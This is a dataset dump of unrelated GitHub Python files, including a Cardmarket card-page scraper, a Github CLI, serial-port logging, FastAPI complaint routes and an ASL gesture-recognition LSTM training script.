head.next","repo_name":"jerome-yutai-shen/leetcode_challenges","sub_path":"2_add_two_numbers.py","file_name":"2_add_two_numbers.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21855243273","text":"import undetected_chromedriver as uc\nimport pandas as pd\nimport random\nimport re\n\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nfrom bs4 import BeautifulSoup\n\nimport scrapers\n\n# As you can maybe see, the core has been heavily simplified\n# multithreading is quite the bi**h and making it work was tough.\n\nuser_agents = []\nurls_occurrences_dictionnary = {}\ntotal_number_of_url = 0\noutput_data = []\nglobal _signals\n\n\ndef file_to_list(filename):\n with open(filename, 'r') as file:\n lines = file.read().splitlines()\n return lines\n\n\ndef load_user_agents():\n global user_agents\n user_agents = file_to_list(\"chrome_useragents.csv\")\n\n\ndef get_header():\n user_agent = random.choice(user_agents)\n return {\n 'Host': 'www.cardmarket.com',\n 'User-Agent': user_agent,\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',\n }\n\n\ndef request(url, num, total):\n # randomized header data for realism\n try:\n # options (header data, headless)\n options = uc.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument(\"user-agent=\" + random.choice(user_agents))\n\n # driver is what's dwelling in the web\n driver = uc.Chrome(options=options)\n\n # *drum rolls*\n driver.get(url)\n\n # wait for the title of the page to be there\n element = WebDriverWait(driver, 70).until(\n EC.presence_of_element_located((By.XPATH, '/html/body/main/div[3]/div[1]/h1')))\n _signals.emit(element.text + \"\\n[\" + num + \"/\" + total + \"]\")\n soup = BeautifulSoup(driver.page_source, 'lxml')\n list_scrap = scrapers.CMSoupScraper(url, soup)\n output_data.append(list_scrap)\n ''' # Temporarily commented, i will use the previous code for now, then switch there\n\t\t# because this snippet is objectively better, shorter, clearer, and processes less info\n\t\tdl_elements = driver.find_element(By.CSS_SELECTOR,\".labeled\")\n\t\tinner_html = dl_elements.get_attribute(\"innerHTML\")\n\t\tdd_elements = re.findall(r'', inner_html)\n\t\tdt_elements = re.findall(r'', inner_html)\n\t\tif (len(dd_elements) != len(dt_elements)):\n\t\t\tprint(\"Uh Oh ... (it seems like the scraping failed somewhere)\")\n\t\telse :\n\t\t\tout_data = []\n\t\t\tfor i in range(0, len(dd_elements)):\n\t\t\t\tname = re.findall(r'\\\">(.*)', dt_elements[i])[0]\n\t\t\t\tvalue = re.findall(r'\\\">(.*)', dd_elements[i])[0].replace(\"\", \"\").replace(\"\", \"\")\n\t\t\t\tif name == \"Rarity\":\n\t\t\t\t\tvalue = re.findall(r'data-original-title=\"(.*?)\"', value)[0]\n\t\t\t\tif name == \"Reprints\":\n\t\t\t\t\tvalue = re.findall(r' \\((.*?)\\)', value)[0]\n\t\t\t\tif name == \"Printed in\":\n\t\t\t\t\tvalue = re.findall(r'class=\"mb-2\">(.*?)', value)[0]\n\t\t\t\tout_data.append(value)\n\t\t\t\t#print(\"[\"+str(i)+\"]\"+\" \"+name+\" | \"+value)\n\t\t\tglobal output_data\n\t\t\toutput_data.append(out_data)\n\t\t\t'''\n\n\n except Exception as exp:\n print(\"An error occured while trying to scrape \" + url)\n print(\"Please note that this version was never tested on anything else than yugioh.\")\n print(\"If you want to report the error, it is : \\n\" + str(exp))\n\n\n# Getting the HTML content of the page\n# return driver\n\ndef scrape_data(driver):\n # dl_elements = driver.find_elements_by_xpath('//dl[@class=\"labeled row mx-auto no-gutters\"]')\n\n # Iterate over each dl element and find dt and dd within\n data = []\n for dl in dl_elements:\n dt_elements = dl.find_elements_by_tag_name('dt')\n dd_elements = dl.find_elements_by_tag_name('dd')\n\n # Make sure we have the same number of dt and dd elements\n assert len(dt_elements) == len(dd_elements), \"Mismatch in number of dt and dd elements\"\n\n # Extract the text and create a list of [dt, dd] pairs\n data.extend([[dt.text, dd.text] for dt, dd in zip(dt_elements, dd_elements)])\n for elem in data:\n print(elem[0] + \" : \" + elem[1])\n\n\ndef core_run(input_file, output_file, signals, signal_list):\n global _signals\n _signals = signals\n _signals.emit(\"Load user agents\")\n load_user_agents()\n _signals.emit(\"Read input\")\n input_data = file_to_list(input_file)\n _signals.emit(\"Found \" + str(len(input_data)) + \" lines\")\n\n global urls_occurrences_dictionnary\n global total_number_of_url\n urls_occurrences_dictionnary = {}\n total_number_of_url = len(input_data)\n for url in input_data:\n if not url in urls_occurrences_dictionnary:\n urls_occurrences_dictionnary[url] = 1\n else:\n urls_occurrences_dictionnary[url] += 1\n # print(urls_occurrences_dictionnary)\n url_list = list(urls_occurrences_dictionnary.keys())\n\n _signals.emit(\"Reduced to \" + str(len(url_list)) + \" single lines\")\n\n i = 1\n total = len(url_list)\n for single_url in url_list:\n request(single_url, i, total)\n i += 1\n\n print(\"Successfully scraped \" + str(len(output_data)) + \" urls\")\n signal_list.emit(output_data)\n","repo_name":"DrankRock/CMScrape","sub_path":"Fix/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"41452388151","text":"\"\"\"\nExposes a command line interface for the Github module.\n\"\"\"\nimport argparse\nimport os\nimport sys\nfrom typing import Callable, List\nimport pyghub.commands.get_repo\nimport pyghub.commands.commit\nimport pyghub.commands.clone_repo\nimport pyghub.commands.pull\nimport pyghub.commands.push\n\n\n\n# Collect our subparsers from each file in commands/\ncommand_parser_map: List[Callable[[], None]] = [\n pyghub.commands.get_repo.register_subparser,\n pyghub.commands.clone_repo.register_subparser,\n pyghub.commands.commit.register_subparser,\n pyghub.commands.pull.register_subparser,\n pyghub.commands.push.register_subparser,\n]\n\ndef main():\n # First, collect global arguments (just the API token really)\n parser = argparse.ArgumentParser(description=\"Command Line Interface for working with Github's API.\")\n parser.add_argument(\"--api-token\", help=\"Github.com API token\")\n\n # Now, iterate our commands and add each one's subparser\n subparsers = parser.add_subparsers()\n for command_parser in command_parser_map:\n command_parser(subparsers)\n\n args = parser.parse_args()\n\n if not 'func' in args:\n parser.print_help()\n sys.exit(-1)\n\n # Execute the desired command and exit with its return code\n exit_code = args.func(args)\n sys.exit(exit_code)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jayspang/pyghub","sub_path":"pyghub/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73701900721","text":"# 1. Prepare a drawing function\n# 2. Load the model and connect it to the camera\n# 3. Loop over the frames from the video stream\n# 4. For each frame of the stream, the model make an inference and\n# drawing function to display the results.\n\n# a. Import required modules\nimport numpy as np\nimport cv2\nimport tensorflow.keras as K\n\n# b. Function to draw localization bounding boxes on a frame\ndef draw_box(frame:np.ndarray, box:np.ndarray) -> np.ndarray:\n '''\n Input: frame and normalized coordinates of the two corners of a bounding box,\n as an array of four numbers.\n Process: 1. reshapes the 1D array of the box into 2D array\n (first index represents the point and the second represents the x and y coordinates) \n 2. transforms the normalized coordinates to coordinates of image by multiplying with w, h\n 3. draws the green coloured bounding box\n Output: frame with bounding box\n '''\n h,w = frame.shape[0:2]\n pts = (box.reshape((2,2))*np.array([w,h])).astype(np.int)\n cv2.rectangle(frame, tuple(pts[0]), tuple(pts[1]), (0,255,0), 2)\n return frame\n\n# c. Import the model and connect to camera\nmodel = K.models.load_model(\"localization.h5\")\n\ncap = cv2.VideoCapture(0)\n\n# iterate over the frames from the camera,\nfor _, frame in iter(cap.read, (False, None)):\n # resize each frame to a standard size\n input = cv2.resize(frame, (224,224))\n # convert frame to RGB color space\n input = cv2.cvtColor(input, cv2.COLOR_BGR2RGB)\n\n # normalize the image and add another dimension since the model accepts batches of images,\n # and pass the result to the model for inference\n box, = model.predict(input[None]/255)\n # drawing the predicted box\n draw_box(frame, box)\n # display\n cv2.imshow(\"res\", frame)\n if(cv2.waitKey(1) == 27):\n break","repo_name":"Krishna2709/ObjectClassification-Localization","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20931023831","text":"import serial\nimport time\nfrom struct import *\n \nCOM=\"COM4\"\nbitRate=115200\n\nser = serial.Serial(COM, bitRate, timeout=0.1) # 使用するポート番号,ビットレートを宣言\n\ndef bytes2float(data_bytes):\n n=0\n first = 0 \n count = 0\n\n for i in list(str(data_bytes)):\n count += 1\n if i == ';':\n n += 1\n if n == 7:\n first = count\n break\n data_bytes = data_bytes[first-2:-6] #必要なデータだけを取り出す \n data_float = unpack('>ddd',data_bytes) #デコードする\n return data_float\n\ndef csv_write_f():\n\n flag = True\n filename = \"\"\n\n def write(x,y,z):\n\n import datetime\n import csv\n\n nonlocal flag\n nonlocal filename\n\n if flag:\n now_time = datetime.datetime.now()\n filename = 'test_' + now_time.strftime('%Y%m%d_%H%M%S') + '.csv'\n\n with open(filename,'a',newline='') as f: \n writer = csv.writer(f)\n writer.writerow([\"x\", \"y\", \"z\"])\n flag = False\n\n\n with open(filename,'a',newline='') as f: \n writer = csv.writer(f)\n writer.writerow([x, y, z])\n\n return write\n\ncsv_write = csv_write_f()\n\n\ntry:\n\n while True:\n time.sleep(0.1)\n \n data = ser.read_all() #データ(バイト型)を受信\n\n if data != b'':\n print(data)\n data = bytes2float(data) #バイト型からフロート型に変換\n print(data)\n csv_write(*data)\n data = b''\n\t\t\n\nexcept KeyboardInterrupt:\n print('stop!')\n ser.close()\n\n","repo_name":"okaokadadada/2022NSE","sub_path":"serial/receive_serial.py","file_name":"receive_serial.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"201469494","text":"from __future__ import annotations\n\nimport contextlib\nfrom unittest import mock\n\nimport flask\nimport pyquery\n\nfrom git_code_debt.server.app import AppContext\nfrom git_code_debt.server.metric_config import Config\nfrom testing.assertions.response import assert_no_response_errors\nfrom tests import file_diff_stat_test\n\n\ndef test_widget_frame_loads(server):\n response = server.client.get(flask.url_for('widget.frame'))\n assert_no_response_errors(response)\n assert response.pq.find('script')\n\n\n@contextlib.contextmanager\ndef metrics_enabled(widget_metrics):\n config = Config.from_data({\n 'Groups': [],\n 'CommitLinks': {},\n 'ColorOverrides': [],\n 'WidgetMetrics': widget_metrics,\n })\n with mock.patch.object(AppContext, 'config', config):\n yield\n\n\ndef test_widget_data(server):\n with metrics_enabled({'TotalLinesOfCode': {}}):\n response = server.client.post(\n flask.url_for('widget.data'),\n data={'diff': file_diff_stat_test.SAMPLE_OUTPUT},\n )\n response_pq = pyquery.PyQuery(response.json['metrics'])\n assert 'TotalLinesOfCode 1' in ' '.join(response_pq.text().split())\n # Should not find any metrics with no data\n assert not response_pq.find('.metric-none')\n # Should not have metrics we didn't specify\n assert 'TotalLinesOfCode_Text' not in response_pq.text()\n\n\ndef test_widget_data_multiple_values(server):\n with metrics_enabled(\n {'TotalLinesOfCode': {}, 'TotalLinesOfCode_plain-text': {}},\n ):\n response = server.client.post(\n flask.url_for('widget.data'),\n data={'diff': file_diff_stat_test.SAMPLE_OUTPUT},\n )\n response_pq = pyquery.PyQuery(response.json['metrics'])\n assert 'TotalLinesOfCode_plain-text' in response_pq.text()\n","repo_name":"asottile/git-code-debt","sub_path":"tests/server/servlets/widget_test.py","file_name":"widget_test.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":549,"dataset":"github-code","pt":"75"} +{"seq_id":"38991651555","text":"from collections import deque\n\nclass Solution:\n def orangesRotting(self, grid: List[List[int]]) -> int:\n rotten = deque([])\n fresh = set()\n directions = [[0,-1], [-1,0], [0,1], [1,0]]\n minutes = 0\n \n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == 1:\n fresh.add((i,j))\n elif grid[i][j] == 2:\n rotten.append((i,j))\n \n inbound = lambda row, col : 0 <= row < len(grid) and 0 <= col < len(grid[0])\n \n while fresh:\n size = len(rotten)\n if size == 0:\n return -1\n \n for i in range(size):\n tup = rotten.popleft()\n for i in directions:\n a, b = tup[0] + i[0], tup[1] + i[1]\n if inbound(a, b) and grid[a][b] == 1:\n grid[a][b] = 2\n fresh.discard((a, b))\n rotten.append((a, b))\n minutes += 1\n \n return minutes\n \n \n ","repo_name":"amanz55/a2sv_competitiveprogramming","sub_path":"994-rotting-oranges/994-rotting-oranges.py","file_name":"994-rotting-oranges.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"5715461159","text":"\"\"\" This is simple module for finding first on by value. \"\"\"\n\n# init val for previous bal\nprev = 0.0\n\ndef run (val):\n global prev\n\n if val > 0.0 and prev == 0.0:\n prev = val\n return True\n elif val == 0.0:\n reset()\n return False\n else:\n return False\n\ndef reset():\n global prev\n prev = 0.0\n\n","repo_name":"sonir/sonilabPython","sub_path":"check_new_on.py","file_name":"check_new_on.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"10697050486","text":"import math\nimport numpy as np\n\ndef func(x):\n return math.sqrt(2*x**2 + 1)\n\ndef rectagular(a, b, n):\n I = 0\n x = np.linspace(a, b, n)\n l = x[1] - x[0] \n for i in range(0, n-1):\n I += l*func(x[i])\n print(I)\n\ndef main():\n rectagular(0, 1, 1000)\n\nif __name__ == \"__main__\":\n main()","repo_name":"K1r1llLukoyanov/NumberMethods","sub_path":"numberIntegration/rectangulars.py","file_name":"rectangulars.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26531367033","text":"from typing import List\n\nfrom api.db.repository import auth, complaint\nfrom api.db.session import get_db\nfrom fastapi import APIRouter, Depends, status\nfrom fastapi_jwt_auth import AuthJWT\nfrom api.schemas.common import StatusResponse\nfrom api.schemas.complaint import (\n ComplaintCreate,\n ComplaintInfo,\n ComplaintUpdate,\n)\nfrom sqlalchemy.orm import Session\n\nrouter = APIRouter()\ndefault_session = Depends(get_db)\ndefault_authJWT = Depends()\n\n\n@router.post(\n \"/\",\n response_model=ComplaintInfo,\n status_code=status.HTTP_201_CREATED,\n)\ndef create_complaint(\n req_complaint: ComplaintCreate,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Create a Complaint and store it in the database\n \"\"\"\n auth.is_only_user_permitted(db, Auth)\n\n return complaint.create(db, req_complaint)\n\n\n@router.get(\"/\", response_model=List[ComplaintInfo])\ndef get_all_complaints(\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n limit: int = 100,\n offset: int = 0,\n statuses: str = None,\n):\n \"\"\"\n Get all the Complaints stored in database\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n if statuses:\n statuses = statuses.split(\",\")\n\n return complaint.get_all(db, offset, limit, statuses)\n\n\n@router.get(\"/{complaint_id}\", response_model=ComplaintInfo)\ndef get_complaint(\n complaint_id: int,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Get the Complaint with the given ID\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n\n return complaint.get_by_id(db, complaint_id)\n\n\n@router.put(\"/{complaint_id}\", response_model=ComplaintInfo)\ndef update_complaint(\n complaint_id: int,\n req_complaint: ComplaintUpdate,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Update a Complaint stored in the database\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n\n return complaint.update(db, complaint_id, req_complaint)\n\n\n@router.delete(\"/{complaint_id}\", response_model=StatusResponse)\ndef delete_complaint(\n complaint_id: int,\n db: Session = default_session,\n Auth: AuthJWT = default_authJWT,\n):\n \"\"\"\n Delete the Complaint with the given ID\n \"\"\"\n auth.is_only_admin_permitted(db, Auth)\n complaint.delete(db, complaint_id)\n\n return {\n \"success\": True,\n \"message\": \"Complaint deleted successfully\",\n }\n","repo_name":"mskab/ePetition","sub_path":"api/routes/complaint.py","file_name":"complaint.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"41390531678","text":"\nimport cv2\nimport numpy as np\nimport os\nfrom matplotlib import pyplot as plt\nimport mediapipe as mp\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nfrom tensorflow.keras.utils import to_categorical\nfrom sklearn.metrics import multilabel_confusion_matrix, accuracy_score\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\nfrom tensorflow.keras.callbacks import TensorBoard\ntf.random.set_seed(42)\n\nmp_holistic = mp.solutions.holistic # Holistic model\nmp_drawing = mp.solutions.drawing_utils # Drawing utilities\n\ndef mediapipe_detection(image, model):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # COLOR CONVERSION BGR 2 RGB\n image.flags.writeable = False # Image is no longer writeable\n results = model.process(image) # Make prediction\n image.flags.writeable = True # Image is now writeable \n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # COLOR COVERSION RGB 2 BGR\n return image, results\n\ndef draw_landmarks(image, results):\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_TESSELATION) # Draw face connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS) # Draw pose connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw right hand connections\n\ndef draw_styled_landmarks(image, results):\n # Draw face connections\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_TESSELATION, \n mp_drawing.DrawingSpec(color=(80,110,10), thickness=1, circle_radius=1), \n mp_drawing.DrawingSpec(color=(80,256,121), thickness=1, circle_radius=1)\n ) \n # Draw pose connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(80,22,10), thickness=2, circle_radius=4), \n mp_drawing.DrawingSpec(color=(80,44,121), thickness=2, circle_radius=2)\n ) \n # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(121,22,76), thickness=2, circle_radius=4), \n mp_drawing.DrawingSpec(color=(121,44,250), thickness=2, circle_radius=2)\n ) \n # Draw right hand connections \n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(245,117,66), thickness=2, circle_radius=4), \n mp_drawing.DrawingSpec(color=(245,66,230), thickness=2, circle_radius=2)\n ) \n \n\n\n# In[5]:\n#\n#\n# cap = cv2.VideoCapture(0)\n# # Set mediapipe model\n# with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n# while cap.isOpened():\n#\n# # Read feed\n# ret, frame = cap.read()\n#\n# # Make detections\n# image, results = mediapipe_detection(frame, holistic)\n#\n# # Draw landmarks\n# draw_styled_landmarks(image, results)\n#\n# # Show to screen\n# cv2.imshow('OpenCV Feed', image)\n#\n# # Break gracefully\n# if cv2.waitKey(10) & 0xFF == ord('q'):\n# break\n# cap.release()\n# cv2.destroyAllWindows()\n#\n#\n# # In[6]:\n#\n#\n# draw_landmarks(frame, results)\n# plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n\n# # 3. Extract Keypoint Values\n\n# In[7]:\n#\n#\n# pose = []\n# for res in results.pose_landmarks.landmark:\n# test = np.array([res.x, res.y, res.z, res.visibility])\n# pose.append(test)\n# pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(132)\n# face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(1404)\n# lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\n# rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\n# face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(1404)\n\ndef extract_keypoints(results):\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33*4)\n face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(468*3)\n lh = np.array([[res.x, res.y, res.z] for res in results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\n rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\n return np.concatenate([pose, face, lh, rh])\n\n#result_test = extract_keypoints(results)\n#np.save('0', result_test)\n#np.load('0.npy')\n\n\n# # 4. Setup Folders for Collection\n\n# In[8]:\n\n\n# Path for exported data, numpy arrays\n# Must have data folder connected to this notebook\n# Can be named whatever I named mine 'Data. Can be a filepath as well if you don't want to tie it to the notebook\nDATA_PATH = os.path.join('Data')\n\n# Actions that we try to detect\nactions = np.array(['hello', 'how', 'you'])\n\n# Thirty videos worth of data\nno_sequences = 30\n\n# Videos are going to be 30 frames in length\nsequence_length = 30\n\n# Folder start\nstart_folder = 30\n\n# Need to create a folder for each action with an individual folder in each action for a frame\n# The following will be inside of the Data folder you made above\n# So the data will look like this:\n# hello (this is the main folder)\n## inside the folder above we put the following folders\n# 0\n# 1\n# 2\n# 3\n# ....\n# 26\n# 27\n# 29\n# Will have 30 folders total for each action, each folder representing a frame of the action that is to be detected\nfor action in actions: \n for sequence in range(no_sequences):\n try: \n os.makedirs(os.path.join(DATA_PATH, action, str(sequence)))\n except:\n pass\n\n\n\n# # 6. Preprocess Data and Create Labels and Features\n\nlabel_map = {label:num for num, label in enumerate(actions)}\nprint(label_map)\n\n\nsequences, labels = [], []\nfor action in actions:\n for sequence in range(no_sequences):\n window = []\n for frame_num in range(sequence_length):\n res = np.load(os.path.join(DATA_PATH, action, str(sequence), \"{}.npy\".format(frame_num)))\n window.append(res)\n sequences.append(window)\n labels.append(label_map[action])\n\nprint(np.array(sequences).shape)\nprint(np.array(labels).shape)\n\nX = np.array(sequences)\n\nprint(X.shape)\n\ny = to_categorical(labels).astype(int)\n\n\n# In[17]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)\n\n\n# In[18]:\n\n\nprint(y_test.shape)\n\n\n# # 7. Build and Train LSTM Neural Network\n\n# In[19]:\n\n\nlog_dir = os.path.join('Logs')\ntb_callback = TensorBoard(log_dir=log_dir)\n\n\n# In[20]:\n\n\nmodel = Sequential()\nmodel.add(LSTM(64, return_sequences=True, activation='relu', input_shape=(30,1662)))\nmodel.add(LSTM(128, return_sequences=True, activation='relu'))\nmodel.add(LSTM(64, return_sequences=False, activation='relu'))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dense(actions.shape[0], activation='softmax'))\n\n\n# In[21]:\n\n\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n\n\n# In[23]:\n\n\nmodel.fit(X_train, y_train, epochs=1000, callbacks=[tb_callback])\n\n\n# In[24]:\n\n\nmodel.summary()\n\n\n# # 8. Make Predictions\n\n# In[25]:\n\n\nres = model.predict(X_test)\n\n\n# In[31]:\n\n\nprint(actions[np.argmax(res[2])])\n\n\n# In[32]:\n\n\nprint(actions[np.argmax(y_test[2])])\n\n\n# # 9. Save Weights\n\n# In[33]:\n\n\nmodel.save('hellohowyou.h5')\n\n\n# In[42]:\n\n# ------------------------------------------------------------------------------------------------\n#del model\n\n\n# In[8]:\n\n#\n# np.array(['hello', 'iloveyou', 'thanks'])\n# model = Sequential()\n# model.add(LSTM(64, return_sequences=True, activation='relu', input_shape=(30,1662)))\n# model.add(LSTM(128, return_sequences=True, activation='relu'))\n# model.add(LSTM(64, return_sequences=False, activation='relu'))\n# model.add(Dense(64, activation='relu'))\n# model.add(Dense(32, activation='relu'))\n# model.add(Dense(actions.shape[0], activation='softmax'))\n# model.load_weights('action.h5')\n\n# ------------------------------------------------------------------------------------------------\n# # 10. Evaluation using Confusion Matrix and Accuracy\n\n# In[34]:\n\n\nyhat = model.predict(X_test)\nprint(yhat)\n\n\n# In[35]:\n\n\nytrue = np.argmax(y_test, axis=1).tolist()\nyhat = np.argmax(yhat, axis=1).tolist()\n\n\n# In[36]:\n\n\nprint(multilabel_confusion_matrix(ytrue, yhat))\n\n\n# In[37]:\n\n\nprint(accuracy_score(ytrue, yhat))\n\n\n# # 11. Test in Real Time\n\n# In[38]:\n\n\ncolors = [(245,117,16), (117,245,16), (16,117,245)]\ndef prob_viz(res, actions, input_frame, colors):\n output_frame = input_frame.copy()\n for num, prob in enumerate(res):\n cv2.rectangle(output_frame, (0,60+num*40), (int(prob*100), 90+num*40), colors[num], -1)\n cv2.putText(output_frame, actions[num], (0, 85+num*40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2, cv2.LINE_AA)\n \n return output_frame\n\n\n# In[39]:\n\n\n#plt.figure(figsize=(18,18))\n#plt.imshow(prob_viz(res, actions, image, colors))\n\n\n# In[41]:\n\n\n# 1. New detection variables\nsequence = []\nsentence = []\npredictions = []\nthreshold = 0.5\n\n# cap = cv2.VideoCapture(0)\n# # Set mediapipe model\n# with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n# while cap.isOpened():\n#\n# # Read feed\n# ret, frame = cap.read()\n#\n# # Make detections\n# image, results = mediapipe_detection(frame, holistic)\n#\n# # Draw landmarks\n# draw_styled_landmarks(image, results)\n#\n# # 2. Prediction logic\n# keypoints = extract_keypoints(results)\n# sequence.append(keypoints)\n# sequence = sequence[-30:]\n#\n# if len(sequence) == 30:\n# res = model.predict(np.expand_dims(sequence, axis=0))[0]\n# print(actions[np.argmax(res)])\n# predictions.append(np.argmax(res))\n#\n#\n# #3. Viz logic\n# if np.unique(predictions[-10:])[0]==np.argmax(res):\n# if res[np.argmax(res)] > threshold:\n#\n# if len(sentence) > 0:\n# if actions[np.argmax(res)] != sentence[-1]:\n# sentence.append(actions[np.argmax(res)])\n# else:\n# sentence.append(actions[np.argmax(res)])\n#\n# if len(sentence) > 5:\n# sentence = sentence[-5:]\n#\n# # Viz probabilities\n# image = prob_viz(res, actions, image, colors)\n#\n# cv2.rectangle(image, (0,0), (640, 40), (245, 117, 16), -1)\n# cv2.putText(image, ' '.join(sentence), (3,30),\n# cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n#\n# # Show to screen\n# cv2.imshow('OpenCV Feed', image)\n#\n# # Break gracefully\n# if cv2.waitKey(10) & 0xFF == ord('q'):\n# break\n# cap.release()\n# cv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"adecaria/ASL-Gesture-Recognition","sub_path":"SignOn.py","file_name":"SignOn.py","file_ext":"py","file_size_in_byte":11913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73417869042","text":"import requests\nimport json\nimport time\n\n\n#Creating all variables\nAPI_TOKEN = \"\"\naccount_id = ''\nsuccess_flow = ''\n\nheaders = {\n 'app-token': API_TOKEN,\n}\n\nparams = (\n ('account_id', account_id),\n)\n\n\n#Getting all touchpoints and tasks (from 'account_id' Timeline )\ntouchpoint = requests.get('https://app.totango.com/api/v2/events', headers=headers, params=params)\ntouchpoint_data = json.loads(touchpoint.content)\n\n#Searching each individual Touchpoint and Task until the first defined 'success_flow' is found\nfor timeline_event in touchpoint_data:\n if timeline_event['properties']['activity_type_id'] == success_flow:\n #Gathers all notes from Touchpoint/Tasks, plus the epoch time (which is then converted to MM/DD/YYY)\n notes = timeline_event['note_content']['text']\n epoch = timeline_event['timestamp']\n date = time.strftime('%m-%d-%Y', time.localtime(epoch/1000))\n break\n","repo_name":"thidelrios/totango_touchpoint_search","sub_path":"totango_touchpoint.py","file_name":"totango_touchpoint.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39760289461","text":"import urllib\ndef download(url):\n print('Downloading:', url)\n # 抓取错误模块\n try:\n # 核心语句\n html = urllib.urlopen(url).read()\n except urllib.error.HTTPError as e:\n print('Download error', e.reason)\n html = None\n return html \n","repo_name":"dertaek/a-b-test-projects","sub_path":".vscode/web scraping.py","file_name":"web scraping.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9352583259","text":"'''\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a 